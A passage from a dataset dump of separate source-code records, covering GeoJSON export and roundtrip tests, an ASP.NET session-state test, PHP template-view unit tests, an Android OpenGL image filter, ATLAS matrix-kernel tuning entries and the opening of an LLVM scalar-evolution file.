combine-files -o target=a combine-layers', {'a.json': a, 'b.json': b}, function(err, output) {\n assert.deepEqual(JSON.parse(output['a.json']), {\n type: 'GeometryCollection',\n geometries: [a]\n });\n done();\n });\n\n })\n\n })\n\n it('default file extension is .json', function(done) {\n api.applyCommands('-i test/data/two_states.json -o', {}, function(err, output) {\n assert('two_states.json' in output);\n done();\n })\n\n })\n\n it('-o extension= overrides default file extension', function(done) {\n api.applyCommands('-i test/data/two_states.json -o extension=geojson', {}, function(err, output) {\n assert('two_states.geojson' in output);\n done();\n })\n\n })\n\n it('export FeatureCollection with null geometries if no shapes are present', function() {\n var lyr = {\n data: new DataTable([{foo: 'a'}])\n }\n var dataset = {\n layers: [lyr]\n };\n var target = {type: \"FeatureCollection\", features: [\n {type: 'Feature', geometry: null, properties: {foo: 'a'}}\n ]};\n\n assert.deepEqual(api.internal.exportDatasetAsGeoJSON(dataset, {}), target);\n })\n\n it('collapsed polygon exported as null geometry', function () {\n var arcs = new api.internal.ArcCollection([[[1, 1], [2, 3], [1, 1]]]);\n var lyr = {\n geometry_type: \"polygon\",\n data: new DataTable([{ID: 1}]),\n shapes: [[[0]]]\n };\n var dataset = {\n arcs: arcs,\n layers: [lyr]\n };\n\n var target = {\"type\":\"FeatureCollection\",\"features\":[\n {type: 'Feature', properties: {ID: 1}, geometry: null}\n ]};\n\n assert.deepEqual(api.internal.exportDatasetAsGeoJSON(dataset, {}), target);\n })\n\n it('use cut_table option', function () {\n var arcs = new api.internal.ArcCollection([[[1, 1], [1, 3], [2, 3], [1, 1]]]);\n var lyr = {\n geometry_type: \"polygon\",\n data: new DataTable([{ID: 1}]),\n shapes: [[[0]]]\n };\n\n var geojson = {\"type\":\"GeometryCollection\",\"geometries\":[\n { type: 'Polygon',\n coordinates: [[[1, 1], [1, 3], [2, 3], [1, 1]]]\n }\n ]};\n var table = [{\n ID: 1\n }];\n var opts = {\n cut_table: true,\n format: 'geojson',\n gj2008: true\n };\n var files = api.internal.exportFileContent({layers:[lyr], arcs:arcs}, opts);\n assert.deepEqual(JSON.parse(files[0].content), geojson);\n assert.deepEqual(JSON.parse(files[1].content), table);\n })\n\n it('use drop_table and id_field options', function () {\n var arcs = new api.internal.ArcCollection([[[1, 1], [1, 3], [2, 3], [1, 1]]]);\n var lyr = {\n geometry_type: \"polygon\",\n data: new DataTable([{FID: 1}]),\n shapes: [[[0]]]\n };\n\n var geojson = {\"type\":\"FeatureCollection\", \"features\":[{\n type: \"Feature\",\n properties: null,\n id: 1,\n geometry: {\n type: 'Polygon',\n coordinates: [[[1, 1], [1, 3], [2, 3], [1, 1]]]\n }\n }]};\n\n var opts = {\n drop_table: true,\n id_field: 'FID',\n format: 'geojson',\n gj2008: true\n };\n var files = api.internal.exportFileContent({layers:[lyr], arcs:arcs}, opts);\n assert.deepEqual(JSON.parse(files[0].content), geojson);\n })\n\n it('export points with bbox', function() {\n var lyr = {\n geometry_type: 'point',\n shapes: [[[0, 1]], [[2, 3], [1, 4]]]\n },\n dataset = {\n layers: [lyr]\n };\n\n var target = {\n type: \"GeometryCollection\",\n geometries: [{\n type: \"Point\",\n coordinates: [0,1]\n }, {\n type: \"MultiPoint\",\n coordinates: [[2, 3], [1, 4]]\n }],\n bbox: [0, 1, 2, 4]\n };\n\n var result = api.internal.exportDatasetAsGeoJSON(dataset, {bbox: true});\n assert.deepEqual(result, target);\n })\n\n it('export polygons with bbox', function() {\n var arcs = new api.internal.ArcCollection(\n [[[1, 1], [1, 3], [2, 3], [1, 1]],\n [[-1, 1], [0, 0], [0, 1], [-1, 1]]]),\n lyr = {\n geometry_type: \"polygon\",\n shapes: [[[0]], [[~1]]]\n },\n dataset = {\n arcs: arcs,\n layers: [lyr]\n };\n\n var target = {\"type\":\"GeometryCollection\",\"geometries\":[\n { type: 'Polygon',\n coordinates: [[[1, 1], [1, 3], [2, 3], [1, 1]]]\n }, { type: 'Polygon',\n coordinates: [[[-1, 1], [0, 1], [0, 0], [-1, 1]]]\n }\n ]\n , bbox: [-1, 0, 2, 3]\n };\n var result = api.internal.exportDatasetAsGeoJSON(dataset, {bbox: true});\n assert.deepEqual(result, target);\n })\n\n it('export feature with id property', function() {\n var lyr = {\n geometry_type: \"point\",\n shapes: [[[1, 1]]],\n data: new DataTable([{FID: 1}])\n },\n dataset = {\n layers: [lyr]\n };\n\n var target = {\"type\":\"FeatureCollection\",\"features\":[{\n type: 'Feature',\n properties: null,\n id: 1,\n geometry: { type: 'Point',\n coordinates: [1, 1]\n }\n }]\n };\n var result = api.internal.exportDatasetAsGeoJSON(dataset, {id_field: 'FID'});\n assert.deepEqual(result, target);\n })\n\n })\n\n describe('Import/Export roundtrip tests', function () {\n\n it('empty GeometryCollection', function () {\n var empty = {\"type\":\"GeometryCollection\",\"geometries\":[]};\n assert.deepEqual(empty, importExport(empty));\n })\n\n it('preserve object data properties', function() {\n var input = {type:\"FeatureCollection\", features: [{\n type: \"Feature\",\n properties: {\n foo: {\"a\": 3},\n bar: [2, 3, 4]\n },\n geometry: null\n }]};\n assert.deepEqual(input, importExport(input));\n })\n\n it('preserve top-level crs', function(done) {\n var crs = {\n \"type\": \"name\",\n \"properties\": {\"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\"}\n };\n var input = {\n crs: crs,\n type: 'Point',\n coordinates: [0, 0]\n };\n api.applyCommands('-o gj2008', input, function(err, data) {\n var output = JSON.parse(data);\n assert.deepEqual(output.crs, crs);\n done();\n })\n });\n\n // REMOVING obsolete crs test\n // it('preserve null crs', function(done) {\n // var input = {\n // crs: null,\n // type: 'Point',\n // coordinates: [0, 0]\n // };\n // api.applyCommands('', input, function(err, data) {\n // var output = JSON.parse(data);\n // assert.strictEqual(output.crs, null);\n // done();\n // })\n // });\n\n // REMOVING obsolete crs test\n // it('set crs to null if data is projected', function(done) {\n // var crs = {\n // \"type\": \"name\",\n // \"properties\": {\"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\"}\n // };\n // var input = {\n // crs: crs,\n // type: 'Point',\n // coordinates: [0, 0]\n // };\n // api.applyCommands('-proj +proj=merc', input, function(err, data) {\n // var output = JSON.parse(data);\n // assert.strictEqual(output.crs, null);\n // done();\n // })\n // });\n\n it('do not set crs to null if coords were transformed to latlong', function(done) {\n var input = {\n type: 'Point',\n coordinates: [0, 0]\n };\n api.applyCommands('-proj wgs84 from=\"merc\"', input, function(err, data) {\n var output = JSON.parse(data);\n assert.strictEqual(output.crs, undefined);\n done();\n })\n });\n\n it('preserve ids with no properties', function() {\n var input = {\n type: \"FeatureCollection\",\n features: [{\n type: \"Feature\",\n properties: null,\n id: 'A',\n geometry: {\n type: \"Point\",\n coordinates: [1, 1]\n }\n }]\n };\n assert.deepEqual(input, importExport(input));\n })\n\n it('preserve ids with properties', function() {\n var input = {\n type: \"FeatureCollection\",\n features: [{\n type: \"Feature\",\n properties: {foo: 'B', bar: 'C'},\n id: 'A',\n geometry: {\n type: \"Point\",\n coordinates: [1, 1]\n }\n }]\n };\n assert.deepEqual(input, importExport(input));\n })\n\n\n it('null geom, one property', function () {\n var geom = {\"type\":\"FeatureCollection\", \"features\":[\n { type: \"Feature\",\n geometry: null,\n properties: {ID: 0}\n }\n ]};\n assert.deepEqual(geom, importExport(geom));\n })\n\n it('collapsed polygon converted to null geometry', function() {\n var geom = {\"type\":\"FeatureCollection\", \"features\":[\n { type: \"Feature\",\n geometry: {\n type: \"Polygon\",\n coordinates: [[[100.0, 0.0], [100.0, 1.0], [100.0, 0.0]]]\n },\n properties: {ID: 0}\n }\n ]};\n\n var target = {\"type\":\"FeatureCollection\", \"features\":[\n { type: \"Feature\",\n geometry: null,\n properties: {ID: 0}\n }\n ]};\n\n assert.deepEqual(target, importExport(geom));\n })\n\n it('ccw polygon and cw hole are reversed', function() {\n var onePoly = {\n type:\"GeometryCollection\",\n geometries:[{\n type: \"Polygon\",\n coordinates: [[[100.0, 0.0], [110.0, 0.0], [110.0, 10.0], [100.0, 10.0], [100.0, 0.0]],\n [[101.0, 1.0], [101.0, 9.0], [109.0, 9.0], [109.0, 1.0], [101.0, 1.0]]]\n }]};\n var output = importExport(onePoly);\n var target = {\n type:\"GeometryCollection\",\n // bbox: [100, 0, 110, 10],\n geometries:[{\n type: \"Polygon\",\n coordinates: [[[100.0, 0.0], [100.0, 10.0], [110.0, 10.0], [110.0, 0.0], [100.0, 0.0]],\n [[101.0, 1.0], [109.0, 1.0], [109.0, 9.0], [101.0, 9.0], [101.0, 1.0]]\n ]\n }]};\n assert.deepEqual(target, output);\n })\n\n it('reversed ring with duplicate points is not removed (#42)', function() {\n var geoStr = api.cli.readFile(fixPath(\"data/ccw_polygon.json\"), 'utf8'),\n outputObj = importExport(geoStr);\n assert.ok(outputObj.features[0].geometry != null);\n })\n\n\n it('GeometryCollection with a Point and a MultiPoint', function() {\n var json = {\n type: \"GeometryCollection\",\n geometries:[{\n type: \"Point\",\n coordinates: [2, 1]\n }, {\n type: \"MultiPoint\",\n coordinates: [[1, 0], [1, 0]]\n }]\n };\n\n assert.deepEqual(importExport(json), json);\n })\n\n\n it('FeatureCollection with two points and a null geometry', function() {\n var json = {\n type: \"FeatureCollection\",\n features:[{\n type: \"Feature\",\n properties: {id: 'pdx'},\n geometry: {\n type: \"Point\",\n coordinates: [0, 0]\n }\n }, {\n type: \"Feature\",\n properties: {id: 'sfo'},\n geometry: {\n type: \"Point\",\n coordinates: [-1, 1]\n }\n }, {\n type: \"Feature\",\n properties: {id: ''},\n geometry: null\n }]\n };\n\n assert.deepEqual(importExport(json), json);\n })\n\n })\n\n describe('Export/Import roundtrip tests', function () {\n\n it('two states', function () {\n geoJSONRoundTrip('data/two_states.json');\n })\n\n it('six counties, two null geometries', function () {\n geoJSONRoundTrip('data/six_counties_three_null.json');\n })\n\n it('Internal state borders (polyline)', function () {\n geoJSONRoundTrip('data/ne/ne_110m_admin_1_states_provinces_lines.json');\n })\n /* */\n })\n})\n\nfunction geoJSONRoundTrip(fname) {\n var data = api.importFile(fixPath(fname));\n var files = api.internal.exportFileContent(data, {format:'geojson'});\n var json = files[0].content.toString();\n var data2 = api.internal.importFileContent(json, 'json');\n var files2 = api.internal.exportFileContent(data2, {format:'geojson'});\n var json2 = files2[0].content.toString();\n assert.equal(json, json2);\n}\n\nfunction importExport(obj, noTopo) {\n var json = Utils.isString(obj) ? obj : JSON.stringify(obj);\n var geom = api.internal.importFileContent(json, 'json', {no_topology: noTopo});\n return api.internal.exportDatasetAsGeoJSON(geom, {});\n}\n"} {"text": "\t\n\n
\n\t

\n\t\n
\n"} {"text": "//\n// Authors:\n// Rafael Mizrahi \n// Erez Lotan \n// Vladimir Krasnov \n//\n//\n// Copyright (c) 2002-2005 Mainsoft Corporation.\n//\n// Permission is hereby granted, free of charge, to any person obtaining\n// a copy of this software and associated documentation files (the\n// \"Software\"), to deal in the Software without restriction, including\n// without limitation the rights to use, copy, modify, merge, publish,\n// distribute, sublicense, and/or sell copies of the Software, and to\n// permit persons to whom the Software is furnished to do so, subject to\n// the following conditions:\n//\n// The above copyright notice and this permission notice shall be\n// included in all copies or substantial portions of the Software.\n//\n// THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\n// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\n// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\n// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n//\n\nusing System;\nusing System.Collections;\nusing System.Web;\nusing System.Web.UI;\nusing System.Web.UI.WebControls;\nusing System.Web.UI.HtmlControls;\n\nnamespace GHTTests.System_Web_dll.System_Web_SessionState\n{\n\tpublic class HttpSessionState_GetEnumerator_\n\t\t: GHTBaseWeb \n\t{\n\t\t#region Web Form Designer generated code\n\t\toverride protected void OnInit(EventArgs e) \n\t\t{\n\t\t\t//\n\t\t\t// CODEGEN: This call is required by the ASP.NET Web Form Designer.\n\t\t\t//\n\t\t\tInitializeComponent();\n\t\t\tbase.OnInit(e);\n\t\t}\n\t\t\n\t\t/// \n\t\t/// Required method for Designer support - do not modify\n\t\t/// the contents of this method with the code editor.\n\t\t/// \n\t\tprivate void InitializeComponent() \n\t\t{ \n\t\t\tthis.Load += new System.EventHandler(this.Page_Load);\n\t\t}\n\t\t#endregion\n\n\t\tprivate void Page_Load(object sender, System.EventArgs e) \n\t\t{\n\t\t\t//Put user code to initialize the page here\n\n\t\t\tSystem.Web.UI.HtmlControls.HtmlForm frm = (HtmlForm)this.FindControl(\"Form1\");\n\t\t\tGHTTestBegin(frm);\n\n\t\t\tGHTSubTestBegin(\"GHTSubTest1\");\n\t\t\ttry \n\t\t\t{\n\n\t\t\t\tSession.Clear();\n\n\t\t\t\tSession[\"v1\"] = \"value1\";\n\t\t\t\tSession[\"v2\"] = \"value2\";\n\t\t\t\tSession[\"v3\"] = \"value3\";\n\t\t\t\tSession[\"v4\"] = \"value4\";\n\t\t\t\tSession[\"v5\"] = \"value5\";\n\t\t\t\tSession[\"v6\"] = \"value6\";\n\t\t\t\tSession[\"v7\"] = \"value7\";\n\n\t\t\t\tIEnumerator items= Session.GetEnumerator();\n\t\t\t\tstring item;\n\n\t\t\t\twhile ( items.MoveNext() )\n\t\t\t\t{\n\t\t\t\t\titem = (string)items.Current;\n\t\t\t\t\tGHTSubTestAddResult(\"Session(\\\"\" + item + \"\\\") = \" + Session[item]);\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch (Exception ex) \n\t\t\t{\n\t\t\t\tGHTSubTestUnexpectedExceptionCaught(ex);\n\t\t\t}\n\t\t\tGHTSubTestEnd();\n\t\t\tGHTTestEnd();\n\t\t}\n\t}\n}\n"} {"text": "templateVariableContainer = $this->getMockBuilder(TemplateVariableContainer::class)->setMethods(['exists', 'remove', 'add'])->getMock();\n $this->viewHelperVariableContainer = $this->getMockBuilder(ViewHelperVariableContainer::class)->setMethods(['setView'])->getMock();\n $this->renderingContext = $this->getMockBuilder(RenderingContext::class)->setMethods(['getViewHelperVariableContainer', 'getVariableProvider'])->disableOriginalConstructor()->getMock();\n $this->renderingContext->expects(self::any())->method('getViewHelperVariableContainer')->will(self::returnValue($this->viewHelperVariableContainer));\n $this->renderingContext->expects(self::any())->method('getVariableProvider')->will(self::returnValue($this->templateVariableContainer));\n $this->view = $this->getMockBuilder(AbstractTemplateView::class)->setMethods(['getTemplateSource', 'getLayoutSource', 'getPartialSource', 'canRender', 'getTemplateIdentifier', 'getLayoutIdentifier', 'getPartialIdentifier'])->getMock();\n $this->view->setRenderingContext($this->renderingContext);\n }\n\n /**\n * @test\n */\n public function viewIsPlacedInViewHelperVariableContainer()\n {\n $this->viewHelperVariableContainer->expects(self::once())->method('setView')->with($this->view);\n $this->view->setRenderingContext($this->renderingContext);\n }\n\n /**\n * @test\n */\n public function assignAddsValueToTemplateVariableContainer()\n {\n $this->templateVariableContainer->expects(self::at(0))->method('add')->with('foo', 'FooValue');\n $this->templateVariableContainer->expects(self::at(1))->method('add')->with('bar', 'BarValue');\n\n $this->view\n ->assign('foo', 'FooValue')\n ->assign('bar', 'BarValue');\n }\n\n /**\n * @test\n */\n public function assignCanOverridePreviouslyAssignedValues()\n {\n $this->templateVariableContainer->expects(self::at(0))->method('add')->with('foo', 'FooValue');\n $this->templateVariableContainer->expects(self::at(1))->method('add')->with('foo', 'FooValueOverridden');\n\n $this->view->assign('foo', 'FooValue');\n $this->view->assign('foo', 'FooValueOverridden');\n }\n\n /**\n * @test\n */\n public function assignMultipleAddsValuesToTemplateVariableContainer()\n {\n $this->templateVariableContainer->expects(self::at(0))->method('add')->with('foo', 'FooValue');\n $this->templateVariableContainer->expects(self::at(1))->method('add')->with('bar', 'BarValue');\n $this->templateVariableContainer->expects(self::at(2))->method('add')->with('baz', 'BazValue');\n\n $this->view\n ->assignMultiple(['foo' => 'FooValue', 'bar' => 'BarValue'])\n ->assignMultiple(['baz' => 'BazValue']);\n }\n\n /**\n * @test\n */\n public function assignMultipleCanOverridePreviouslyAssignedValues()\n {\n $this->templateVariableContainer->expects(self::at(0))->method('add')->with('foo', 'FooValue');\n $this->templateVariableContainer->expects(self::at(1))->method('add')->with('foo', 'FooValueOverridden');\n $this->templateVariableContainer->expects(self::at(2))->method('add')->with('bar', 'BarValue');\n\n $this->view->assign('foo', 'FooValue');\n $this->view->assignMultiple(['foo' => 'FooValueOverridden', 'bar' => 'BarValue']);\n }\n}\n"} {"text": "package com.aserbao.androidcustomcamera.whole.record.filters.gpuFilters.baseFilter;\n\nimport android.opengl.GLES20;\n\nimport com.aserbao.androidcustomcamera.base.MyApplication;\nimport com.aserbao.androidcustomcamera.R;\n\nimport com.aserbao.androidcustomcamera.whole.record.filters.gpuFilters.utils.OpenGlUtils;\n\n\npublic class MagicInkwellFilter extends GPUImageFilter {\n\tprivate int[] inputTextureHandles = {-1};\n\tprivate int[] inputTextureUniformLocations = {-1};\n private int mGLStrengthLocation;\n\n\tpublic MagicInkwellFilter(){\n\t\tsuper(NO_FILTER_VERTEX_SHADER, OpenGlUtils.readShaderFromRawResource(R.raw.inkwell));\n\t}\n\t\n\tpublic void onDestroy() {\n super.onDestroy();\n GLES20.glDeleteTextures(1, inputTextureHandles, 0);\n for(int i = 0; i < inputTextureHandles.length; i++)\n \tinputTextureHandles[i] = -1;\n }\n\t\n\tprotected void onDrawArraysAfter(){\n\t\tfor(int i = 0; i < inputTextureHandles.length\n\t\t\t\t&& inputTextureHandles[i] != OpenGlUtils.NO_TEXTURE; i++){\n\t\t\tGLES20.glActiveTexture(GLES20.GL_TEXTURE0 + (i+3));\n\t\t\tGLES20.glBindTexture(GLES20.GL_TEXTURE_2D, 0);\n\t\t\tGLES20.glActiveTexture(GLES20.GL_TEXTURE0);\n\t\t}\n\t}\n\t \n\tprotected void onDrawArraysPre(){\n\t\tfor(int i = 0; i < inputTextureHandles.length \n\t\t\t\t&& inputTextureHandles[i] != OpenGlUtils.NO_TEXTURE; i++){\n\t\t\tGLES20.glActiveTexture(GLES20.GL_TEXTURE0 + (i+3) );\n\t\t\tGLES20.glBindTexture(GLES20.GL_TEXTURE_2D, inputTextureHandles[i]);\n\t\t\tGLES20.glUniform1i(inputTextureUniformLocations[i], (i+3));\n\t\t}\n\t}\n\t\n\tprotected void onInit(){\n\t\tsuper.onInit();\n\t\tfor(int i=0; i < inputTextureUniformLocations.length; i++)\n\t\t\tinputTextureUniformLocations[i] = GLES20.glGetUniformLocation(getProgram(), \"inputImageTexture\"+(2+i));\n\t\tmGLStrengthLocation = GLES20.glGetUniformLocation(mGLProgId,\n\t\t\t\t\"strength\");\n\t}\n\t\n\tprotected void onInitialized(){\n\t\tsuper.onInitialized();\n\t\tsetFloat(mGLStrengthLocation, 1.0f);\n\t runOnDraw(new Runnable(){\n\t\t public void run(){\n\t\t \tinputTextureHandles[0] = OpenGlUtils.loadTexture(MyApplication.getContext(), \"filter/inkwellmap.png\");\n\t\t }\n\t });\n\t}\n}\n"} {"text": "ID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=24 NB=4 KB=24 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-1.031111e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=48 NB=4 KB=48 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-1.941996e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=72 NB=4 KB=72 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-2.659937e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=96 NB=4 KB=96 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-3.140357e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=120 NB=4 KB=120 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-3.513656e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=144 NB=4 KB=144 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-3.740889e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=168 NB=4 KB=168 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-3.960681e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=192 NB=4 KB=192 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.135516e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=216 NB=4 KB=216 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.289915e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=240 NB=4 KB=240 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.416430e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=264 NB=4 KB=264 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.513734e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=288 NB=4 KB=288 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.599546e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=312 NB=4 KB=312 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.678302e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=336 NB=4 KB=336 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.722391e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=360 NB=4 KB=360 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.782746e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=384 NB=4 KB=384 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.841730e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=408 NB=4 KB=408 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.854265e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=432 NB=4 KB=432 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.886417e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=456 NB=4 KB=456 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.912444e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\nID=25 ROUT='ATL_samm24x4x2_fma3.S' AUTH='R. Clint Whaley' TA='T' TB='N' \\\n OPMV=14 VLEN=8 KU=2 NU=4 MU=24 MB=480 NB=4 KB=480 AOUTER=1 KRUNTIME=1 \\\n LDCTOP=1 \\\n MFLOP=-4.944009e+04 ASM=GAS_x8664 \\\n CFLAGS='-x assembler-with-cpp -mavx -mfma' COMP='gcc'\n"} {"text": "//===- ScalarEvolutionNormalization.cpp - See below -----------------------===//\n//\n// The LLVM Compiler Infrastructure\n//\n// This file is distributed under the University of Illinois Open Source\n// License. See LICENSE.TXT for details.\n//\n//===----------------------------------------------------------------------===//\n//\n// This file implements utilities for working with \"normalized\" expressions.\n// See the comments at the top of ScalarEvolutionNormalization.h for details.\n//\n//===----------------------------------------------------------------------===//\n\n#include \"llvm/IR/Dominators.h\"\n#include \"llvm/Analysis/LoopInfo.h\"\n#include \"llvm/Analysis/ScalarEvolutionExpressions.h\"\n#include \"llvm/Analysis/ScalarEvolutionNormalization.h\"\nusing namespace llvm;\n\n/// IVUseShouldUsePostIncValue - We have discovered a \"User\" of an IV expression\n/// and now we need to decide whether the user should use the preinc or post-inc\n/// value. If this user should use the post-inc version of the IV, return true.\n///\n/// Choosing wrong here can break dominance properties (if we choose to use the\n/// post-inc value when we cannot) or it can end up adding extra live-ranges to\n/// the loop, resulting in reg-reg copies (if we use the pre-inc value when we\n/// should use the post-inc value).\nstatic bool IVUseShouldUsePostIncValue(Instruction *User, Value *Operand,\n const Loop *L, DominatorTree *DT) {\n // If the user is in the loop, use the preinc value.\n if (L->contains(User)) return false;\n\n BasicBlock *LatchBlock = L->getLoopLatch();\n if (!LatchBlock)\n return false;\n\n // Ok, the user is outside of the loop. If it is dominated by the latch\n // block, use the post-inc value.\n if (DT->dominates(LatchBlock, User->getParent()))\n return true;\n\n // There is one case we have to be careful of: PHI nodes. These little guys\n // can live in blocks that are not dominated by the latch block, but (since\n // their uses occur in the predecessor block, not the block the PHI lives in)\n // should still use the post-inc value. Check for this case now.\n PHINode *PN = dyn_cast(User);\n if (!PN || !Operand) return false; // not a phi, not dominated by latch block.\n\n // Look at all of the uses of Operand by the PHI node. If any use corresponds\n // to a block that is not dominated by the latch block, give up and use the\n // preincremented value.\n for (unsigned i = 0, e = PN->getNumIncomingValues(); i != e; ++i)\n if (PN->getIncomingValue(i) == Operand &&\n !DT->dominates(LatchBlock, PN->getIncomingBlock(i)))\n return false;\n\n // Okay, all uses of Operand by PN are in predecessor blocks that really are\n // dominated by the latch block. Use the post-incremented value.\n return true;\n}\n\nnamespace {\n\n/// Hold the state used during post-inc expression transformation, including a\n/// map of transformed expressions.\nclass PostIncTransform {\n TransformKind Kind;\n PostIncLoopSet 